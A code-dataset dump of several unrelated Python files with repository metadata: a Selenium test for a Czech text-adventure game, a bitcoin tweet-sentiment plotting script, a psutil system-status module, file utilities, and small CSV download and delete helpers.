assert 'jen dvě kancelářské sponky' in driver.find_element(By.ID, 'message').text
assert 'sponky' in driver.find_element(By.ID, 'in_room').text
perform_and_wait('take', 'sponky')
assert 'OK' in driver.find_element(By.ID, 'message').text
assert 'sponky' in driver.find_element(By.ID, 'in_inventory').text
assert driver.find_element(By.ID, 'use_dropdown')
# go to homepage
driver.find_element(By.ID, 'home').click()
# continue game
driver.find_element(By.ID, 'continue_game').click()
assert 'Kancelář' in driver.find_element(By.ID, 'room_description').text
assert 'sponky' in driver.find_element(By.ID, 'in_inventory').text
perform_and_wait('go', 'south')
assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
perform_and_wait('open', 'dvere')
assert 'OK' in driver.find_element(By.ID, 'message').text
perform_and_wait('go', 'east')
assert 'Sklad' in driver.find_element(By.ID, 'room_description').text
assert 'smeták' in driver.find_element(By.ID, 'in_room').text
perform_and_wait('take', 'smetak')
assert 'OK' in driver.find_element(By.ID, 'message').text
assert 'smeták' in driver.find_element(By.ID, 'in_inventory').text
# go to homepage
driver.find_element(By.ID, 'home').click()
# start a new game
driver.find_element(By.ID, 'new_game').click()
assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
assert driver.find_element(By.ID, 'open_dropdown')
assert 'sponky' not in driver.find_element(By.ID, 'in_inventory').text
assert 'smeták' not in driver.find_element(By.ID, 'in_inventory').text
perform_and_wait('open', 'dvere')
assert 'OK' in driver.find_element(By.ID, 'message').text
perform_and_wait('go', 'east')
assert 'Sklad' in driver.find_element(By.ID, 'room_description').text
assert 'smeták' in driver.find_element(By.ID, 'in_room').text
assert 'krabici hřebíků' in driver.find_element(By.ID, 'in_room').text
perform_and_wait('take', 'krabice')
assert 'Jeden bude stačit' in driver.find_element(By.ID, 'message').text
assert 'krabici hřebíků' in driver.find_element(By.ID, 'in_room').text
assert 'hřebík' in driver.find_element(By.ID, 'in_inventory').text
| 3,584 | 0 | 44 |
6e64305e1e82509bdea2615d39ca0bdc7b96d09d | 1,653 | py | Python | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null |
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
temp_list = []
for index, row in df.iterrows():
f_date = row['DATE'][4:20]
year = row['DATE'][26:]
f_date = f_date + year
# print(f_date)
regex = re.findall(r"[a-zA-Z]|\d", f_date)
f_date = "".join(regex)
datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
# print(datetime_object)
t = today_date - datetime_object
# print(t)
temp_list.append(t)
df['T_minus'] = temp_list
f1 = []
f2 = []
for index, row in df.iterrows():
time = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
# time = row['T_minus'].seconds
f1.append(time)
print(time)
f2.append(row['COMPOUND'])
# print(row['COMPOUND'])
# print(len(f1))
# print(len(f2))
# Pickle arrays
f1_file = open('btc_hours_f1.pkl', 'wb')
f2_file = open('btc_hours_f2.pkl', 'wb')
pickle.dump(f1, f1_file)
pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| 24.671642 | 85 | 0.640653 |
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
temp_list = []
for index, row in df.iterrows():
f_date = row['DATE'][4:20]
year = row['DATE'][26:]
f_date = f_date + year
# print(f_date)
regex = re.findall(r"[a-zA-Z]|\d", f_date)
f_date = "".join(regex)
datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
# print(datetime_object)
t = today_date - datetime_object
# print(t)
temp_list.append(t)
df['T_minus'] = temp_list
f1 = []
f2 = []
for index, row in df.iterrows():
time = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
# time = row['T_minus'].seconds
f1.append(time)
print(time)
f2.append(row['COMPOUND'])
# print(row['COMPOUND'])
# print(len(f1))
# print(len(f2))
# Pickle arrays
f1_file = open('btc_hours_f1.pkl', 'wb')
f2_file = open('btc_hours_f2.pkl', 'wb')
pickle.dump(f1, f1_file)
pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| 0 | 0 | 0 |
2c6a9976f7657424840a5d3cbdfa941b9489f0c1 | 3,523 | py | Python | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | 2 | 2020-02-24T02:15:30.000Z | 2022-03-30T05:26:18.000Z | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | null | null | null | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | null | null | null | from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_pc_status() -> Union[Dict[str, str], Dict[str, dict], Dict[str, str]]:
"""With the help of the psutil module, scanns the PC for information about all the drives, the memory and the battery, if it has one.
Returns disk, memory, battery in this order.
"""
disks = get_disk_status()
memory = {"RAM":psutil.virtual_memory()._asdict(), "SWAP": psutil.swap_memory()._asdict()}
battery = get_battery_status()
return disks, memory, battery
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, str]]:
"""Using the bar module, creates a visual representation of the system's status.
It shows the disks' and the momory's percentage, the used and the total space, and the battery's remaning lifetime, if it's pugged, and the battery's percentage.
"""
disks, memory, battery = get_pc_status()
bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
if battery != None:
bars.update(round(battery["percent"], 1), False)
battery["bar"] = bars.bar()
if in_dict:
d = {}
else:
string = ""
for mp, disk in disks.items():
bars.update(round(disk["percent"], 1), False)
dbar = bars.bar()
tmp = round(int(disk["total"]) / (1024 **3), 2)
total = f"{tmp} GiB"
tmp = round(int(disk["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
if in_dict:
d[f"{mp.upper()}"]=[total, used, dbar]
else:
string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
for key in ["RAM", "SWAP"]:
tmp = round(int(memory[key]["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
tmp = round(int(memory[key]["total"]) / (1024 **3), 2)
_max = f"{tmp} GiB"
bars.update(round(memory[key]["percent"], 1), False)
_bar = bars.bar()
if in_dict:
d[key]=[_max, used, _bar]
else:
string += f"Max RAM memory: {_max} / Used memory: {used}\n{_bar}\n"
if battery == None:
if in_dict:
d['Battery']=["Not detected"]
else:
string += "Battery not detected!"
else:
tmp = "" if battery["power_plugged"] else "not "
if in_dict:
d["Battery"]=[timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
else:
string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
if in_dict:
return d
else:
return string
if __name__ == "__main__" :
print(get_graphical(25))
| 37.478723 | 165 | 0.599773 | from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_temp() -> float:
if not hasattr(psutil, "sensors_temperatures"):
return None
temps = psutil.sensors_temperatures()
if not temps:
return None
cpu_temps = temps["coretemp"]
return cpu_temps[0].current
def get_disk_status() -> Dict[str, str]:
disks = dict()
partitions = psutil.disk_partitions()
for partition in partitions:
if partition.fstype.lower() in valid_fstypes:
disks[partition._asdict()["mountpoint"]] = psutil.disk_usage("{}".format(partition._asdict()["mountpoint"]))._asdict()
return disks
def get_pc_status() -> Union[Dict[str, str], Dict[str, dict], Dict[str, str]]:
"""With the help of the psutil module, scanns the PC for information about all the drives, the memory and the battery, if it has one.
Returns disk, memory, battery in this order.
"""
disks = get_disk_status()
memory = {"RAM":psutil.virtual_memory()._asdict(), "SWAP": psutil.swap_memory()._asdict()}
battery = get_battery_status()
return disks, memory, battery
def get_battery_status() -> Dict[str, str]:
try:
battery = psutil.sensors_battery()._asdict()
except:
battery = None
return battery
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, str]]:
"""Using the bar module, creates a visual representation of the system's status.
It shows the disks' and the momory's percentage, the used and the total space, and the battery's remaning lifetime, if it's pugged, and the battery's percentage.
"""
disks, memory, battery = get_pc_status()
bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
if battery != None:
bars.update(round(battery["percent"], 1), False)
battery["bar"] = bars.bar()
if in_dict:
d = {}
else:
string = ""
for mp, disk in disks.items():
bars.update(round(disk["percent"], 1), False)
dbar = bars.bar()
tmp = round(int(disk["total"]) / (1024 **3), 2)
total = f"{tmp} GiB"
tmp = round(int(disk["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
if in_dict:
d[f"{mp.upper()}"]=[total, used, dbar]
else:
string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
for key in ["RAM", "SWAP"]:
tmp = round(int(memory[key]["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
tmp = round(int(memory[key]["total"]) / (1024 **3), 2)
_max = f"{tmp} GiB"
bars.update(round(memory[key]["percent"], 1), False)
_bar = bars.bar()
if in_dict:
d[key]=[_max, used, _bar]
else:
string += f"Max RAM memory: {_max} / Used memory: {used}\n{_bar}\n"
if battery == None:
if in_dict:
d['Battery']=["Not detected"]
else:
string += "Battery not detected!"
else:
tmp = "" if battery["power_plugged"] else "not "
if in_dict:
d["Battery"]=[timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
else:
string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
if in_dict:
return d
else:
return string
if __name__ == "__main__" :
print(get_graphical(25))
| 674 | 0 | 69 |
3b99b9dd6b06bd5c78b691884ff6d652212f2f36 | 659 | py | Python | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
| 20.59375 | 47 | 0.544765 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
class FileUtils:
@classmethod
def read_dict(cls, filepath):
"""
读取字典数据
:param str filepath: 文件地址
"""
with open(filepath, 'r') as f:
if filepath.endswith('.yml'):
return yaml.safe_load(f)
lines = f.readlines()
return json.loads(''.join(lines))
@classmethod
def save_yml(cls, filepath, data):
"""保存成 yml 格式文件"""
filepath = os.path.expanduser(filepath)
with open(filepath, 'w') as f:
yaml.dump(data, f)
| 0 | 554 | 23 |
4606bcc51ea2eb49e447b7dd4c5dcabff35dcc25 | 225 | py | Python | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | null | null | null | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | 1 | 2020-04-29T23:00:26.000Z | 2020-04-29T23:00:26.000Z | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | null | null | null |
import sys
if __name__ == '__main__':
main()
| 9.782609 | 37 | 0.573333 |
import sys
def main():
input ="1.1.1.1"
output = defangIPaddr(input)
print(output)
def defangIPaddr(input):
input = input.replace('.', '[.]')
return input
if __name__ == '__main__':
main()
| 120 | 0 | 44 |
56ffea9c0aa97af0ce4ad0bdbe4ca4c90c3ff9f1 | 44 | py | Python | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | 1 | 2021-10-17T09:23:59.000Z | 2021-10-17T09:23:59.000Z | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | null | null | null | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | null | null | null | from .domain import *
from .common import *
| 14.666667 | 21 | 0.727273 | from .domain import *
from .common import *
| 0 | 0 | 0 |
b6020f9f3d1ebec20e80cdb91c19f83673740879 | 857 | py | Python | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | import os
import urllib
| 25.969697 | 87 | 0.589265 | import os
import urllib
def get_data(url):
try:
filename = os.path.basename(url)
# urllib.urlopen(url)
if not os.path.exists(filename):
request = urllib.request.Request(url)
with urllib.request.urlopen(request) as response:
csv = response.read()
with open(os.path.join("/Users/tondapu/analysis", filename), 'wb') as file:
file.write(csv)
return('downloading')
else:
return('file exists')
except urllib.error.HTTPError as error:
return(error.code)
except urllib.error.URLError as error:
return(error.code)
def del_data(url):
filename = os.path.basename(url)
if os.path.isfile(filename):
os.remove(filename)
return('deleted file')
else:
return('no file to delete') | 786 | 0 | 46 |